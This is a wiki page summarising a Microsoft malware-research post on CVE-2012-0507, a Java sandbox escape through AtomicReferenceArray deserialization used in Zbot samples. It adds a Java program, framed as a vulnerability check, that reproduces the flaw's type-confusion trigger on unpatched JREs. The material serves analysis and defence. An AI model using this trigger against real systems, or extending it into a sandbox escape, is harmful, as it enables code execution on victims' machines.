An interesting case of JRE sandbox breach (CVE-2012-0507)

From Botnets.fr
Malware: Zbot
Date: 2012 / 20 Mar 2012
Editor/Conference: Microsoft
Link: http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx (archive copy at the Wayback Machine)
Author: Jeong Wook (Matt) Oh, Chun Feng

Abstract

Recently we received a few samples that exploit the latest patched JRE (Java Runtime Environment) vulnerability. These samples are kind of unusual to see, but they can be used to develop highly reliable exploits. The malicious Java applet is loaded from an obfuscated HTML file. The Java applet contains two Java class files: one class file triggers the vulnerability and the other is a loader class used for loading.

The vulnerability-triggering class actually performs deserialization of an object array and uses a vulnerability in the AtomicReferenceArray to disarm the JRE sandbox mechanism. The attacker deliberately crafted the serialized object data. This reference array issue is very serious since the exploit is not a memory corruption issue, but a logical flaw in the handling of the array. So the exploit is highly reliable, and that might be one of the reasons why the bad guys picked up this vulnerability for their attacks. We determined this vulnerability to be CVE-2012-0507.
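The logical flaw the abstract describes is a type confusion: the serialized form of AtomicReferenceArray carries its backing array, a crafted stream can declare that array as a narrower type such as String[], and the unpatched set() method stored into it without a store check, so an object of one class could be read back through a reference of another. The following is an added example, not code from the MMPC post or from the JDK, that a practitioner can use to check whether a given JRE still behaves this way. The class name AraTypeConfusionCheck is made up for this page; the private field name array comes from the JDK source of AtomicReferenceArray. Instead of hand-encoding the malicious stream bytes, the example assigns a String[] to the Object[]-typed field through reflection (a legal covariant assignment) and lets ObjectOutputStream write it, which produces a stream equivalent to the attacker's crafted object data. JREs carrying the fix copy a non-Object[] backing array into a fresh Object[] in readObject, so the check reports PATCHED there; on JDK 9 and later the reflective access additionally needs --add-opens java.base/java.util.concurrent.atomic=ALL-UNNAMED, and the VarHandle-based set() performs its own store check.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.concurrent.atomic.AtomicReferenceArray;

// Added example (not code from the MMPC post or the JDK): reports whether the running JRE
// still shows the CVE-2012-0507 type-confusion behaviour in AtomicReferenceArray.
// Run with:  java AraTypeConfusionCheck
// On JDK 9+: java --add-opens java.base/java.util.concurrent.atomic=ALL-UNNAMED AraTypeConfusionCheck
public class AraTypeConfusionCheck {

    // The private backing-array field of AtomicReferenceArray (name taken from the JDK source).
    private static Field backingField() throws Exception {
        Field f = AtomicReferenceArray.class.getDeclaredField("array");
        f.setAccessible(true);
        return f;
    }

    // Stand-in for the attacker's crafted serialized object data. Rather than hand-encoding
    // the stream, we store a String[] in the Object[]-typed field (legal covariant assignment)
    // and serialize normally; the stream then declares the field value as [Ljava.lang.String;
    // which is what a hand-crafted stream would contain.
    static byte[] craftStream() throws Exception {
        AtomicReferenceArray<Object> ara = new AtomicReferenceArray<Object>(1);
        backingField().set(ara, new String[1]);
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(ara);
        oos.close();
        return bos.toByteArray();
    }

    // Deserializes the crafted stream and classifies the JRE's behaviour.
    @SuppressWarnings("unchecked")
    static String check() throws Exception {
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(craftStream()));
        AtomicReferenceArray<Object> ara = (AtomicReferenceArray<Object>) ois.readObject();
        ois.close();
        Object backing = backingField().get(ara);

        // Fixed JREs normalise a non-Object[] backing array to Object[] inside readObject,
        // so the attacker-chosen array type never reaches set().
        if (backing.getClass() == Object[].class) {
            return "PATCHED: readObject normalised the backing array to Object[]";
        }

        // The backing array is still a String[]. A correct store into a String[] must reject
        // an Integer; the unpatched set() wrote through Unsafe.putObjectVolatile with no check.
        try {
            ara.set(0, Integer.valueOf(42));
        } catch (RuntimeException e) {   // ArrayStoreException or ClassCastException
            return "MITIGATED: backing array is " + backing.getClass().getName()
                 + " but set() rejected the store with " + e.getClass().getName();
        }

        // No exception: a String[] now holds an Integer. Reading an element through the
        // String[] reference performs no type check either, so the object is type-confused.
        String[] confused = (String[]) backing;
        Object slot = confused[0];
        return "VULNERABLE: String[] slot 0 holds a " + slot.getClass().getName();
    }

    public static void main(String[] args) throws Exception {
        System.out.println(check());
    }
}
```

The check stops at demonstrating the confused element and does not go on to call methods through the mistyped reference, which is where a real exploit turns the confusion into a sandbox escape. The useful signal for a defender is the first branch: if readObject has already replaced the attacker-supplied array type with a plain Object[], the crafted stream has no foothold regardless of what set() does afterwards.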